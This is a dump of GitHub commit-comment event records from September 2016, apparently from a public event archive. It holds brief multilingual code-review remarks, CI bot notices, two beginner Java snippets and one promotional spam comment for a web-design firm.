{"id":"4607662355","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19143923,"position":6,"line":115,"path":"src/Images/wwwroot/Images/elements/so-juicy-filedrop/juicy-filedrop.html","commit_id":"bdc2dc74304c607f1037320ea5a3bdf0b6ec27da","created_at":"2016-09-23T10:01:47Z","updated_at":"2016-09-23T10:01:47Z","body":"`this.$.txtUploadFile` is assigned to a `element` variable just one line below. It would be cleaner to use that variable."}},"created_at":"2016-09-23T10:01:47Z"}
{"id":"4607675795","type":"CommitCommentEvent","actor":{"login":"jiny2"},"repo":{"name":"stanlyxiang/incubator-hawq"},"payload":{"comment":{"id":19143940,"position":null,"line":null,"path":null,"commit_id":"0f5cec04203304c22558e89f4ce29266f4643f33","created_at":"2016-09-23T10:04:40Z","updated_at":"2016-09-23T10:04:40Z","body":"LGTM"}},"created_at":"2016-09-23T10:04:40Z"}
{"id":"4607677301","type":"CommitCommentEvent","actor":{"login":"RIELTechnologies"},"repo":{"name":"RIELTechnologies/RIELTechnologies"},"payload":{"comment":{"id":19143943,"position":2,"line":2,"path":"README.md","commit_id":"0ee0c1267df1181a62de309d5b6eb5d80b63dd1e","created_at":"2016-09-23T10:05:00Z","updated_at":"2016-09-23T10:05:00Z","body":"[Web Design and Social Media: How They Closely Work Hand In Hand](http://www.rieltechnologies.com\r\n![rieldigital](https://cloud.githubusercontent.com/assets/22392110/18782255/2475e302-81a3-11e6-99cb-46c70fe5e442.jpg)\r\n)\r\nWith internet having its reach to more and more people every day, it makes a lot of sense to market your company or services that you have offer, over social media. Promotion on the social media alone is not going to benefit you in the longer run and to make the ball roll in your court; you have to do it along with the best website design with the help of a Web Designer that are available to you. \r\nAs there are many platforms that give you an option to showcase your services to the masses, you need to make sure that you are targeting all the niches. A good Web design company will be able to help you out in lot of ways, as they offer you a package where they not only help you with the Web Design, but they also take care of all the promotional activities for you as well. Social media works on the basic four principals that we are going to target in this article.\r\n•\tResourcefulness\r\nThe biggest advantage that you have when you take a help from a professional web design company, is they let you have a clearer look at the available options that you have and they get you the best one of the lot. This lets you select the best resources to forward them to your loyal followers and readers. This promotes your brand as reliable and trustworthy entity to people and they keep coming back for more.\r\n•\tBuilding Relationships\r\nWhenever anyone is going to have a look at your page at the social media, he will be clicking at the link that you have provided for the web page and it needs to be in a design format, which instantly attracts the visitor and makes him hunt for more information. This will make it far easier for you to promote yourself and eventually build the trust.\r\n•\tContent and Design\r\nContent is the king and content is what that leads the visitor to the information that he is looking for. Having a content that is related is just not enough for a web page but you also have to make sure that it is been designed according to the layout of the website, where it fits exactly as per the need. Regular updates of the content along with the related images and design needs to be done, so that the viewers have their interest maintained on the website.\r\n\r\n\r\n\r\n\r\n•\tGetting More Promotion and Ultimately Sales\r\nThe main motive behind social media promotion along with all the tools of web designs is done to get in more sales to the brand. Social media and digital marketing is a place that continues to promote your brand even when you sleep and this is an area where you should be giving your more attention to, always.\r\n[RIEL Technologies](http://www.rieltechnologies.com) is one of the best Website designing company in Indore and we have all the solutions tailor made for you to make your brand stand out from the competition.\r\n"}},"created_at":"2016-09-23T10:05:00Z"}
{"id":"4607680404","type":"CommitCommentEvent","actor":{"login":"GowniRupesh"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19143947,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-23T10:05:44Z","updated_at":"2016-09-23T10:05:44Z","body":"    class FactorialExample{  \r\n     public static void main(String args[]){  \r\n      int i,fact=1;  \r\n      int number=5;//It is the number to calculate factorial    \r\n      for(i=1;i<=number;i++){    \r\n          fact=fact*i;    \r\n      }    \r\n      System.out.println(\"Factorial of \"+number+\" is: \"+fact);    \r\n     }  \r\n    }  "}},"created_at":"2016-09-23T10:05:44Z"}
{"id":"4607681738","type":"CommitCommentEvent","actor":{"login":"lesander"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19143950,"position":14,"line":77,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-23T10:06:02Z","updated_at":"2016-09-23T10:06:02Z","body":"Fixed the `typeof` derp. Also, if a user wants to disable debugging in the config, setting `config.debug = false` wouldn't work. I'll just remove the `true` check."}},"created_at":"2016-09-23T10:06:02Z"}
{"id":"4607684204","type":"CommitCommentEvent","actor":{"login":"kayelst"},"repo":{"name":"AP-Elektronica-ICT/ipd_2016-ipd16_SmartOutlet"},"payload":{"comment":{"id":19143953,"position":2,"line":657,"path":"README.md","commit_id":"cfed5bdbc9a1822dfad69786795861f45e619b88","created_at":"2016-09-23T10:06:35Z","updated_at":"2016-09-23T10:06:35Z","body":"pô$p"}},"created_at":"2016-09-23T10:06:35Z"}
{"id":"4607686012","type":"CommitCommentEvent","actor":{"login":"kayelst"},"repo":{"name":"AP-Elektronica-ICT/ipd_2016-ipd16_SmartOutlet"},"payload":{"comment":{"id":19143956,"position":4,"line":659,"path":"README.md","commit_id":"cfed5bdbc9a1822dfad69786795861f45e619b88","created_at":"2016-09-23T10:07:00Z","updated_at":"2016-09-23T10:07:00Z","body":"Test\r\n"}},"created_at":"2016-09-23T10:07:00Z"}
{"id":"4607687571","type":"CommitCommentEvent","actor":{"login":"lesander"},"repo":{"name":"lesander/magister-calendar"},"payload":{"comment":{"id":19143958,"position":40,"line":516,"path":"magister-calendar.js","commit_id":"b0a5c7d464d69ce57efd02edd9086912eb37ba44","created_at":"2016-09-23T10:07:19Z","updated_at":"2016-09-23T10:07:19Z","body":"Good point. Although, that would involve calling a getter function, and we already have the `status` value at hand here."}},"created_at":"2016-09-23T10:07:19Z"}
{"id":"4607688790","type":"CommitCommentEvent","actor":{"login":"GowniRupesh"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19143960,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-23T10:07:35Z","updated_at":"2016-09-23T10:07:35Z","body":"    public class ConcatTest{  \r\n        public static void main(String[] args){  \r\n            long startTime = System.currentTimeMillis();  \r\n            StringBuffer sb = new StringBuffer(\"Java\");  \r\n            for (int i=0; i<10000; i++){  \r\n                sb.append(\"Tpoint\");  \r\n            }  \r\n            System.out.println(\"Time taken by StringBuffer: \" + (System.currentTimeMillis() - startTime) + \"ms\");  \r\n            startTime = System.currentTimeMillis();  \r\n            StringBuilder sb2 = new StringBuilder(\"Java\");  \r\n            for (int i=0; i<10000; i++){  \r\n                sb2.append(\"Tpoint\");  \r\n            }  \r\n            System.out.println(\"Time taken by StringBuilder: \" + (System.currentTimeMillis() - startTime) + \"ms\");  \r\n        }  \r\n    }  "}},"created_at":"2016-09-23T10:07:35Z"}
{"id":"4607691612","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19143962,"position":null,"line":null,"path":null,"commit_id":"2dc69f2d1f6c9a60e81eb8f48ce85365d91d82c0","created_at":"2016-09-23T10:08:12Z","updated_at":"2016-09-23T10:08:12Z","body":"из бекграунда нельзя возвращать сложные объекты через сообщения"}},"created_at":"2016-09-23T10:08:12Z"}
{"id":"4607695420","type":"CommitCommentEvent","actor":{"login":"vsnehil"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":19143966,"position":5,"line":22,"path":"docs/notebooks/gensim Quick Start.ipynb","commit_id":"8d4582acd7dc5cf7cf2e211ea1c97da64ac4ebb1","created_at":"2016-09-23T10:09:03Z","updated_at":"2016-09-23T10:09:03Z","body":"this will give readers a better understanding of supervised learning\r\n"}},"created_at":"2016-09-23T10:09:03Z"}
{"id":"4607697439","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19143970,"position":null,"line":null,"path":null,"commit_id":"ee8d38256a5f26842b96a9fbc09921bcfb263c96","created_at":"2016-09-23T10:09:31Z","updated_at":"2016-09-23T10:09:31Z","body":"[Code coverage](https://154-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-23T10:09:31Z"}
{"id":"4607700389","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19143977,"position":32,"line":698,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialListValueBox.java","commit_id":"d228fb3af14b2728ffcd98242976c089cd0da12e","created_at":"2016-09-23T10:10:12Z","updated_at":"2016-09-23T10:10:12Z","body":"this needs to be moved to `onLoad` or the event handler check needs to happen here."}},"created_at":"2016-09-23T10:10:12Z"}
{"id":"4607703784","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19143990,"position":null,"line":null,"path":null,"commit_id":"8708cd70b2e4ba94912875c91cc3229fcfc9790b","created_at":"2016-09-23T10:10:58Z","updated_at":"2016-09-23T10:10:58Z","body":"[Code coverage](https://155-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-23T10:10:58Z"}
{"id":"4607715599","type":"CommitCommentEvent","actor":{"login":"fanisrafailovich"},"repo":{"name":"fanisrafailovich/new"},"payload":{"comment":{"id":19144008,"position":12,"line":12,"path":"Smoky Shop_new — копия/css/style.css","commit_id":"2815ac948944118a120038036e489061e7e912c5","created_at":"2016-09-23T10:13:39Z","updated_at":"2016-09-23T10:13:39Z","body":"здесь гавно какоето"}},"created_at":"2016-09-23T10:13:39Z"}
{"id":"4607716378","type":"CommitCommentEvent","actor":{"login":"reidsneo"},"repo":{"name":"Centreon-Widgets/centreon-widget-service-monitoring"},"payload":{"comment":{"id":19144010,"position":null,"line":null,"path":null,"commit_id":"b0e0a70e199c93117187f97a64533e0ecd89d73a","created_at":"2016-09-23T10:13:49Z","updated_at":"2016-09-23T10:13:49Z","body":"called by parent.iResize(window.name, h);\r\n\r\nbut the function is function ResizeFrame(ifrm, height)"}},"created_at":"2016-09-23T10:13:49Z"}
{"id":"4607716509","type":"CommitCommentEvent","actor":{"login":"efuruncu"},"repo":{"name":"efuruncu/BarcodeReader"},"payload":{"comment":{"id":19144011,"position":null,"line":null,"path":null,"commit_id":"767e3ef444093ce8617dc1d46cc8920e00e96c99","created_at":"2016-09-23T10:13:51Z","updated_at":"2016-09-23T10:13:51Z","body":"![Barcode](https://github.com/efuruncu/BarcodeReader/blob/master/karekod.png \"Barcode\")"}},"created_at":"2016-09-23T10:13:51Z"}
{"id":"4607721216","type":"CommitCommentEvent","actor":{"login":"IsaMaks"},"repo":{"name":"cltl/clariah-vocab-conversion"},"payload":{"comment":{"id":19144022,"position":null,"line":null,"path":null,"commit_id":"7de391cd9beb91c23de357da966ac388d6e1a616","created_at":"2016-09-23T10:14:56Z","updated_at":"2016-09-23T10:14:56Z","body":"'cute' modeled according to diaLOD"}},"created_at":"2016-09-23T10:14:56Z"}
{"id":"4607721675","type":"CommitCommentEvent","actor":{"login":"efuruncu"},"repo":{"name":"efuruncu/BarcodeReader"},"payload":{"comment":{"id":19144023,"position":9,"line":9,"path":"README.md","commit_id":"767e3ef444093ce8617dc1d46cc8920e00e96c99","created_at":"2016-09-23T10:15:02Z","updated_at":"2016-09-23T10:15:02Z","body":"![Barcode](https://github.com/efuruncu/BarcodeReader/blob/master/karekod.png \"Barcode\")"}},"created_at":"2016-09-23T10:15:02Z"}
{"id":"4607721683","type":"CommitCommentEvent","actor":{"login":"fanisrafailovich"},"repo":{"name":"fanisrafailovich/new"},"payload":{"comment":{"id":19144024,"position":12,"line":12,"path":"Smoky Shop_new — копия/css/style.css","commit_id":"2815ac948944118a120038036e489061e7e912c5","created_at":"2016-09-23T10:15:02Z","updated_at":"2016-09-23T10:15:02Z","body":"понял исправляю"}},"created_at":"2016-09-23T10:15:02Z"}
{"id":"4607722027","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19144025,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T10:15:07Z","updated_at":"2016-09-23T10:15:07Z","body":"This is incorrect. Should be\r\n\r\n```\r\nsum = c->vtbl->sum(c, a, b);\r\nc->vtbl->method04(c, sum);\r\n```\r\nI have solution but it's a hack"}},"created_at":"2016-09-23T10:15:07Z"}
{"id":"4607724719","type":"CommitCommentEvent","actor":{"login":"jaaf"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19144032,"position":null,"line":null,"path":null,"commit_id":"181e66b8601c70d55177c7d4f0be8599dc63bfc2","created_at":"2016-09-23T10:15:43Z","updated_at":"2016-09-23T10:15:43Z","body":"Hi, thank you for your comment\r\nI understand your point. I think I avoided writing things like : \r\n`class Customer extends EnregistrementActif ` but I may have made some mistakes in places. \r\nFor titles, I hesitated a bit as the title itself doesn't directly refer to the class (Active Record is not the name of the class, the class name is ActiveRecord) but to the concept behind it. But I can admit that keeping a reference to the name of the class in translation could make things easier to follow for learners. It could be either \r\n\r\n> Enregistrement actif (class Active Record) \r\n\r\nor\r\n\r\n>  Active Record (Enregistrement actif) \r\n\r\nPersonally, I would prefer the former, but if there is a rule to be respected in Yii community, tell me. \r\n\r\nAfter that, I will have a look back at my previous translations with this in mind.\r\n\r\n"}},"created_at":"2016-09-23T10:15:43Z"}
{"id":"4607739038","type":"CommitCommentEvent","actor":{"login":"DavidSHadden"},"repo":{"name":"DavidSHadden/ubuntu-16-apache-php-7.0"},"payload":{"comment":{"id":19144055,"position":null,"line":null,"path":null,"commit_id":"9fc6f09831981c9437c107296630ad0d3dce785e","created_at":"2016-09-23T10:19:01Z","updated_at":"2016-09-23T10:19:01Z","body":"added intl support"}},"created_at":"2016-09-23T10:19:01Z"}
{"id":"4607740646","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144065,"position":3,"line":6,"path":"correction-septembre-2016/florian-manceau/teapot_gui.py","commit_id":"3a4bba5cd2332a870e7e6d0073c6a2dd71ad3459","created_at":"2016-09-23T10:19:23Z","updated_at":"2016-09-23T10:19:23Z","body":"Il est préférable d'enlever les `reload()` à la livraison"}},"created_at":"2016-09-23T10:19:23Z"}
{"id":"4607743824","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144072,"position":13,"line":23,"path":"correction-septembre-2016/florian-manceau/teapot_gui.py","commit_id":"3a4bba5cd2332a870e7e6d0073c6a2dd71ad3459","created_at":"2016-09-23T10:20:06Z","updated_at":"2016-09-23T10:20:06Z","body":"Le choix du nom de variable `name` est un peu sujet à confusion. Par exemple `self.name`, on ne sait pas forcément de quoi il s'agit"}},"created_at":"2016-09-23T10:20:06Z"}
{"id":"4607746367","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144078,"position":70,"line":62,"path":"correction-septembre-2016/florian-manceau/teapot_gui.py","commit_id":"3a4bba5cd2332a870e7e6d0073c6a2dd71ad3459","created_at":"2016-09-23T10:20:39Z","updated_at":"2016-09-23T10:20:39Z","body":"Il n'est pas necessaire de caster `.text()` en `int`, il existe `.value()` pour ca"}},"created_at":"2016-09-23T10:20:39Z"}
{"id":"4607747471","type":"CommitCommentEvent","actor":{"login":"raysan5"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":19144079,"position":null,"line":null,"path":null,"commit_id":"478d3cbb79caa27351cf9e9a5ff9925ca658a89c","created_at":"2016-09-23T10:20:56Z","updated_at":"2016-09-23T10:20:56Z","body":"Thanks for the comment @victorfisac, I'm currently reviewing lighting system, I need to investigate a bit more about it..."}},"created_at":"2016-09-23T10:20:56Z"}
{"id":"4607750168","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"Svenito/radare2"},"payload":{"comment":{"id":19144084,"position":57,"line":862,"path":"libr/asm/p/asm_x86_nz.c","commit_id":"ad83802ca973a126bf37130115509e290b864eae","created_at":"2016-09-23T10:21:30Z","updated_at":"2016-09-23T10:21:30Z","body":"Spaces"}},"created_at":"2016-09-23T10:21:30Z"}
{"id":"4607757273","type":"CommitCommentEvent","actor":{"login":"Boosten"},"repo":{"name":"jeroensak/devdays16"},"payload":{"comment":{"id":19144105,"position":null,"line":null,"path":null,"commit_id":"8b53111dd377827b29dd9709668270bd75c016a9","created_at":"2016-09-23T10:23:11Z","updated_at":"2016-09-23T10:23:11Z","body":"Wat is dit nu weer😂 @bart"}},"created_at":"2016-09-23T10:23:11Z"}
{"id":"4607757278","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19144106,"position":null,"line":null,"path":null,"commit_id":"c26232fb2055a5a6c2f9154e8a1cb7e0889df165","created_at":"2016-09-23T10:23:11Z","updated_at":"2016-09-23T10:23:11Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#TSx9rKTXQMqQuUPW7vsuxA"}},"created_at":"2016-09-23T10:23:11Z"}
{"id":"4607763265","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19144118,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-23T10:24:38Z","updated_at":"2016-09-23T10:24:38Z","body":"It was chaotic, there were duplicates and it was hard to find stuff and I decided that it will not hurt to sort stuff. If it does, please revert it. I will not use the existing 'common' hybrid.yaml file anyway.\r\nWhat you had listed for i3 and Deepin in the netinstall.yaml was useless and would have resulted in tons of conflicts. So I adjusted it.\r\nRe discussion: There are several comments in the threads you opened, but since you ignore mine I don't see where discussion is happening at your end.\r\nCinnamon is not a WM, neither is Deepin, nor Gnome, KDE, Xfce. I don't see how they can use the same hybrid.yaml file.\r\nYou want your stuff tested and at the same time you try to disable that people play with the new functions - that doesn't make sense to me."}},"created_at":"2016-09-23T10:24:38Z"}
{"id":"4607764260","type":"CommitCommentEvent","actor":{"login":"georgehristov"},"repo":{"name":"Telaxus/EPESI"},"payload":{"comment":{"id":19144120,"position":108,"line":157,"path":"modules/Utils/QueryBuilder/QueryBuilder_0.php","commit_id":"954e193381162b929844c99316881d0ec9921adb","created_at":"2016-09-23T10:24:52Z","updated_at":"2016-09-23T10:24:52Z","body":"Great! Thanks a lot!"}},"created_at":"2016-09-23T10:24:52Z"}
{"id":"4607764681","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITAS-IServices"},"payload":{"comment":{"id":19144121,"position":null,"line":null,"path":null,"commit_id":"1856be73a4b6a83ce0bb87fff9340a1eb89be85d","created_at":"2016-09-23T10:24:58Z","updated_at":"2016-09-23T10:24:58Z","body":"__API Description file syntax error on line 47__: base type '201 CreateResponse' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-23T10:24:58Z"}
{"id":"4607766186","type":"CommitCommentEvent","actor":{"login":"ndeloof"},"repo":{"name":"jenkinsci/amazon-ecs-plugin"},"payload":{"comment":{"id":19144133,"position":null,"line":null,"path":null,"commit_id":"7ccd12e2aa66948681b5ad14afa419abebdb6630","created_at":"2016-09-23T10:25:17Z","updated_at":"2016-09-23T10:25:17Z","body":"Any reason you don't rely on maven to run the release process and update pom version accordingly ?"}},"created_at":"2016-09-23T10:25:17Z"}
{"id":"4607778851","type":"CommitCommentEvent","actor":{"login":"danioxoli"},"repo":{"name":"danioxoli/CityFocus"},"payload":{"comment":{"id":19144186,"position":null,"line":null,"path":null,"commit_id":"d16fee99dd3c86b904e7b85dd6fbe21521e0aab9","created_at":"2016-09-23T10:28:19Z","updated_at":"2016-09-23T10:28:19Z","body":"Data processing documentation added"}},"created_at":"2016-09-23T10:28:19Z"}
{"id":"4607785234","type":"CommitCommentEvent","actor":{"login":"VampiricDirewolf"},"repo":{"name":"VampiricDirewolf/activism-framework"},"payload":{"comment":{"id":19144194,"position":27,"line":27,"path":"SOCIALMEDIAPLATFORMS.MD","commit_id":"51828ede7d97455e390c42cc726b265b3dbb8b16","created_at":"2016-09-23T10:29:48Z","updated_at":"2016-09-23T10:29:48Z","body":"I'm not sure what this is supposed to mean?"}},"created_at":"2016-09-23T10:29:48Z"}
{"id":"4607787418","type":"CommitCommentEvent","actor":{"login":"Svenito"},"repo":{"name":"Svenito/radare2"},"payload":{"comment":{"id":19144198,"position":57,"line":862,"path":"libr/asm/p/asm_x86_nz.c","commit_id":"ad83802ca973a126bf37130115509e290b864eae","created_at":"2016-09-23T10:30:18Z","updated_at":"2016-09-23T10:30:18Z","body":"so as per line 855 then?"}},"created_at":"2016-09-23T10:30:18Z"}
{"id":"4607788153","type":"CommitCommentEvent","actor":{"login":"MrSwed"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":19144201,"position":null,"line":null,"path":null,"commit_id":"6669d0c748dd7dd362ad12172ccc6f77827e595d","created_at":"2016-09-23T10:30:28Z","updated_at":"2016-09-23T10:30:28Z","body":"@dmi3yy \r\nwhat for encourage the inability to succinctly express?\r\nmoreover, it is unwise to increase the base memory for all, including those able to fit in the allotted size name, which the majority?"}},"created_at":"2016-09-23T10:30:28Z"}
{"id":"4607788743","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19144205,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T10:30:36Z","updated_at":"2016-09-23T10:30:36Z","body":"Do you think you isolate this code and reproduce it in a unit test? "}},"created_at":"2016-09-23T10:30:36Z"}
{"id":"4607792533","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19144209,"position":null,"line":null,"path":null,"commit_id":"cfa14912f2f079b64808b6fefe18c542ed553135","created_at":"2016-09-23T10:31:30Z","updated_at":"2016-09-23T10:31:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#U_WDg2k_TLu2yY7MGqK4dg"}},"created_at":"2016-09-23T10:31:30Z"}
{"id":"4607793906","type":"CommitCommentEvent","actor":{"login":"tarnfeld"},"repo":{"name":"cloudflare/dns"},"payload":{"comment":{"id":19144210,"position":null,"line":null,"path":null,"commit_id":"f8fb81c25643f138adfec8cbda41d6d83ea0d369","created_at":"2016-09-23T10:31:49Z","updated_at":"2016-09-23T10:31:49Z","body":"What's the story behind this?"}},"created_at":"2016-09-23T10:31:49Z"}
{"id":"4607795039","type":"CommitCommentEvent","actor":{"login":"kaptain-kavern"},"repo":{"name":"kaptain-kavern/CK_AnimalPlant_Pack"},"payload":{"comment":{"id":19144212,"position":null,"line":null,"path":null,"commit_id":"70499164df099b108ae028be546a24c8ef86dcb7","created_at":"2016-09-23T10:32:06Z","updated_at":"2016-09-23T10:32:06Z","body":"Needs to only permit rice or food and lemongrass only in filter defs. See here : https://ludeon.com/forums/index.php?topic=26326.0"}},"created_at":"2016-09-23T10:32:06Z"}
{"id":"4607798227","type":"CommitCommentEvent","actor":{"login":"kaptain-kavern"},"repo":{"name":"kaptain-kavern/CK_AnimalPlant_Pack"},"payload":{"comment":{"id":19144217,"position":null,"line":null,"path":null,"commit_id":"70499164df099b108ae028be546a24c8ef86dcb7","created_at":"2016-09-23T10:32:56Z","updated_at":"2016-09-23T10:32:56Z","body":"*rice or meat"}},"created_at":"2016-09-23T10:32:56Z"}
{"id":"4607799001","type":"CommitCommentEvent","actor":{"login":"ZoltanOnody"},"repo":{"name":"pyconsk/django-konfera"},"payload":{"comment":{"id":19144218,"position":5,"line":4,"path":"konfera/templates/konfera/cfp_form.html","commit_id":"27f9be492eabf69af3906c4c810e2dc4cdab7661","created_at":"2016-09-23T10:33:08Z","updated_at":"2016-09-23T10:33:08Z","body":"Translations can be done directly in templates. See https://github.com/pyconsk/django-konfera/blob/master/konfera/templates/konfera/event_speakers.html#L14"}},"created_at":"2016-09-23T10:33:08Z"}
{"id":"4607804202","type":"CommitCommentEvent","actor":{"login":"eikooc"},"repo":{"name":"suneman/socialgraphs2016"},"payload":{"comment":{"id":19144232,"position":97,"line":97,"path":"assignments/Assignment1.ipynb","commit_id":"af850143505bff0da9800236742e15aa0fe740d8","created_at":"2016-09-23T10:34:24Z","updated_at":"2016-09-23T10:34:24Z","body":"What does this mean?"}},"created_at":"2016-09-23T10:34:24Z"}
{"id":"4607809567","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19144249,"position":null,"line":null,"path":null,"commit_id":"f453cad0812d710ccae10765dda289d5e1e58e8b","created_at":"2016-09-23T10:35:41Z","updated_at":"2016-09-23T10:35:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1141](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14097&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T10:35:41Z"}
{"id":"4607812124","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"sakawatari/achieve"},"payload":{"comment":{"id":19144251,"position":7,"line":17,"path":"app/mailers/notice_mailer.rb","commit_id":"9fe4e4d93b9a359fe32ace2aa8ca45c12a52a513","created_at":"2016-09-23T10:36:19Z","updated_at":"2016-09-23T10:36:19Z","body":"空行は不要です。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-23T10:36:19Z"}
{"id":"4607817005","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"sakawatari/achieve"},"payload":{"comment":{"id":19144256,"position":5,"line":15,"path":"config/initializers/devise.rb","commit_id":"aec88f9db2923355f8509a884c6e5af57289a61c","created_at":"2016-09-23T10:37:33Z","updated_at":"2016-09-23T10:37:33Z","body":"サンプル用のメールアドレスにしてください。\r\nhttp://allabout.co.jp/gm/gc/23887/"}},"created_at":"2016-09-23T10:37:33Z"}
{"id":"4607818437","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"sakawatari/achieve"},"payload":{"comment":{"id":19144262,"position":25,"line":23,"path":"config/routes.rb","commit_id":"aec88f9db2923355f8509a884c6e5af57289a61c","created_at":"2016-09-23T10:37:54Z","updated_at":"2016-09-23T10:37:54Z","body":"こういう最初からあるコメント行は、削除してください。"}},"created_at":"2016-09-23T10:37:54Z"}
{"id":"4607819005","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19144263,"position":null,"line":null,"path":null,"commit_id":"e2812e8c4cff7daba154f851945fd1e217a1ffb6","created_at":"2016-09-23T10:38:02Z","updated_at":"2016-09-23T10:38:02Z","body":"Had to fix several issues in the libidn/libidn2 code path. Added some test cases that cover the different code paths now."}},"created_at":"2016-09-23T10:38:02Z"}
{"id":"4607820167","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"sakawatari/achieve"},"payload":{"comment":{"id":19144266,"position":7,"line":55,"path":"Gemfile","commit_id":"aec88f9db2923355f8509a884c6e5af57289a61c","created_at":"2016-09-23T10:38:20Z","updated_at":"2016-09-23T10:38:20Z","body":"空行不要です。"}},"created_at":"2016-09-23T10:38:20Z"}
{"id":"4607820205","type":"CommitCommentEvent","actor":{"login":"robfe"},"repo":{"name":"claudiajs/pandoc-aws-lambda-binary"},"payload":{"comment":{"id":19144267,"position":12,"line":20,"path":"child-process-promise.js","commit_id":"9464d99c71d710074d640b2162bd46be42089609","created_at":"2016-09-23T10:38:20Z","updated_at":"2016-09-23T10:38:20Z","body":"@gojko (i could be completely wrong but) as far as i can tell, this causes error logs like `2016-09-23T04:32:22.046Z\t4db8f731-8146-11e6-a620-abc9eaf578d7\t<Buffer 66 6c 61 74 65 78 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 70 64 66 6c 61 74 65 78 20 69 73 20 6e 65 65 64 65 64 20 66 6f 72 20 70 64 66 20 6f 75 74 70 75 ... >` (which, converted from ascii, reads `flatex not found. pdflatex is needed for pdf outpu`) in cloudwatch. It'd be great if we could convert the buffer to a string at this point, to make the logs more readable"}},"created_at":"2016-09-23T10:38:20Z"}
{"id":"4607820944","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"sakawatari/achieve"},"payload":{"comment":{"id":19144271,"position":6,"line":24,"path":"app/controllers/blogs_controller.rb","commit_id":"aec88f9db2923355f8509a884c6e5af57289a61c","created_at":"2016-09-23T10:38:32Z","updated_at":"2016-09-23T10:38:32Z","body":"def内にコメントは書かない。"}},"created_at":"2016-09-23T10:38:32Z"}
{"id":"4607821434","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"sakawatari/achieve"},"payload":{"comment":{"id":19144272,"position":3,"line":3,"path":"app/mailers/notice_mailer.rb","commit_id":"aec88f9db2923355f8509a884c6e5af57289a61c","created_at":"2016-09-23T10:38:39Z","updated_at":"2016-09-23T10:38:39Z","body":"これも不要です。"}},"created_at":"2016-09-23T10:38:39Z"}
